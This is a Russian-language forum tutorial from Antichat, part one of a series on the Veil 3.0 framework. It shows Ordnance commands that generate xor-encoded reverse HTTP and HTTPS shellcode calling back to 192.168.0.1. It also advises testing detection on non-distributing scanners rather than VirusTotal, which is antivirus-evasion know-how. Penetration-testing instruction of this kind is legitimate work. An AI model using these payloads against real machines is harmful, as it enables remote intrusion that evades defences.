HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.11.2017, 13:23
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Установка
Часть первая. Veil Ordnance
Часть вторая. Veil Evasion
Взлом удаленного компьютера. Veil-Evasion. Metasploit

Veil Evasion как вы знаете обновился до третьей версии давненько (9 месяцев назад, если быть точнее).
Однако более менее подробного осмотра продукта не нашёл. А если, чего то нет, то разбирайся и создавай сам. Тем более что для начинающих Veil достаточно любопытный инструмент, который задействует в себе сразу несколько компонентов для доставки полезной нагрузки: тут тебе и макросы, и повершелл скрипты, и батники, и крипторы.
Главное на VIRUSTOTAL не грузите ничего, ПАЖАЛУСТА! Если и хотите проверить файл на детект, либо поставьте себе бесплатный какой-нибудь AV (самый простой вариант Avast), либо воспользуйтесь сервисом https://nodistribute.com/, или скомбинируйте и то и то)

Установку достаточно подробно разобрал товарищ @Vander
https://codeby.net/threads/veil-framework.60978/

Окунёмся в функционал:
Veil 3.0 состоит из двух инструментов Ordnance и Evasion, которые можно использовать либо вдумчиво через меню программы, либо быстрыми, как правило, заранее заготовленными командами.

Стандартное меню выглядит следующим образом

Код:


Код:
./Veil.py


Вызываем помощь при использовании инструмента в терминале

Код:


Код:
./Veil.py -h


Veil Ordnance

Ordnance используется для быстрого создания шеллкода, который уже в дальнейшем можно использовать для эксплоитов или полезных нагрузок.

-Получаем список доступных нагрузок для инструмента Ordnance

Код:


Код:
./Veil.py -t Ordnance --list-payloads


-Список достпных енкодеров

Код:


Код:
./Veil.py -t Ordnance --list-encoders


-Используем Ordnance для генерации обратной полезной нагрузки https, которая соединяется с 192.168.0.1 на 4443 порту

Код:


Код:
./Veil.py -t Ordnance --ordnance-payload rev_https --ip 192.168.0.1 --port 4443


-Используем Ordnance для генерации обратной полезной нагрузки http, которая соединяется с 192.168.0.1 на 8080 порту, затем применяется xor енкодер (-e xor) и удаляются плохие символы (-b \\x00\\x0a)

Код:


Код:
./Veil.py -t Ordnance --ordnance-payload rev_http --ip 192.168.0.1 --port 8080 -e xor -b \\x00\\x0a


Чтобы шелкод смог выполнить своё предназначение его необходимо скомпилировать либо с использованием второго инструмента Evasion, либо сторонним софтом.

Ну и гифку закину по использованию через меню самой программы

Про Evasion в след. части .
Спасибо за внимание.

Установка
Часть первая. Veil Ordnance
Часть вторая. Veil Evasion
Взлом удаленного компьютера. Veil-Evasion. Metasploit
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.